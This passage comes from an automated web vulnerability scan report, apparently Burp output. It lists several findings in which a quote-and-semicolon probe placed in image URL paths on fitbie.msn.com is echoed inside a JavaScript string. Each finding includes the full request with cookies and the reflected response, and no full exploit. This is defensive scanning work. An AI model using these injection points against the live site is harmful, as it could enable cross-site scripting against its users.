Expires: Sun, 13 Feb 2011 15:29:59 GMT
Date: Sun, 13 Feb 2011 14:29:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default226f4';c8e94e44f55?destination=node%2Fdefault226f4';c8e94e44f55&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.93. http://fitbie.msn.com/sites/default/files/jennie-nickel-after-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/jennie-nickel-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30a32'%3b31c71af9932 was submitted in the REST URL parameter 2. This input was echoed as 30a32';31c71af9932 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default30a32'%3b31c71af9932/files/jennie-nickel-after-th.jpg?1295907493 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:35 +0000
ETag: "1297607195-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:36 GMT
Date: Sun, 13 Feb 2011 14:26:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default30a32';31c71af9932?destination=node%2Fdefault30a32';31c71af9932&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.94. http://fitbie.msn.com/sites/default/files/kenneth-after-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/kenneth-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b069'%3b51b80e55f8e was submitted in the REST URL parameter 2. This input was echoed as 9b069';51b80e55f8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default9b069'%3b51b80e55f8e/files/kenneth-after-th.jpg?1294790161 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:38 +0000
ETag: "1297607198-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:38 GMT
Date: Sun, 13 Feb 2011 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default9b069';51b80e55f8e?destination=node%2Fdefault9b069';51b80e55f8e&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.95. http://fitbie.msn.com/sites/default/files/lat_pull_B-female-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/lat_pull_B-female-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c5'%3be409784d715 was submitted in the REST URL parameter 2. This input was echoed as d86c5';e409784d715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultd86c5'%3be409784d715/files/lat_pull_B-female-th.jpg?1284678504 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:34 +0000
ETag: "1297607374-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:35 GMT
Date: Sun, 13 Feb 2011 14:29:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd86c5';e409784d715?destination=node%2Fdefaultd86c5';e409784d715&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.96. http://fitbie.msn.com/sites/default/files/lean-belly-dumbbell-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/lean-belly-dumbbell-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd120'%3ba60af6d7a3c was submitted in the REST URL parameter 2. This input was echoed as bd120';a60af6d7a3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultbd120'%3ba60af6d7a3c/files/lean-belly-dumbbell-th_1.jpg?1296175022 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:50 +0000
ETag: "1297607390-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:51 GMT
Date: Sun, 13 Feb 2011 14:29:51 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultbd120';a60af6d7a3c?destination=node%2Fdefaultbd120';a60af6d7a3c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.97. http://fitbie.msn.com/sites/default/files/look_better_naked_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/look_better_naked_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b98'%3b0a04eae77f was submitted in the REST URL parameter 2. This input was echoed as 68b98';0a04eae77f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default68b98'%3b0a04eae77f/files/look_better_naked_th.jpg?1286918148 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:04 +0000
ETag: "1297607404-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:05 GMT
Date: Sun, 13 Feb 2011 14:30:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default68b98';0a04eae77f?destination=node%2Fdefault68b98';0a04eae77f&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.98. http://fitbie.msn.com/sites/default/files/mh_personal_trainer_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/mh_personal_trainer_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d468c'%3b43c9ce21767 was submitted in the REST URL parameter 2. This input was echoed as d468c';43c9ce21767 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultd468c'%3b43c9ce21767/files/mh_personal_trainer_th.jpg?1286832577 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:02 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd468c';43c9ce21767?destination=node%2Fdefaultd468c';43c9ce21767&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.99. http://fitbie.msn.com/sites/default/files/muscular-man-lifting-dumbbell-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/muscular-man-lifting-dumbbell-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28b05'%3bf096ad2ca7c was submitted in the REST URL parameter 2. This input was echoed as 28b05';f096ad2ca7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default28b05'%3bf096ad2ca7c/files/muscular-man-lifting-dumbbell-th.jpg?1297382745 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
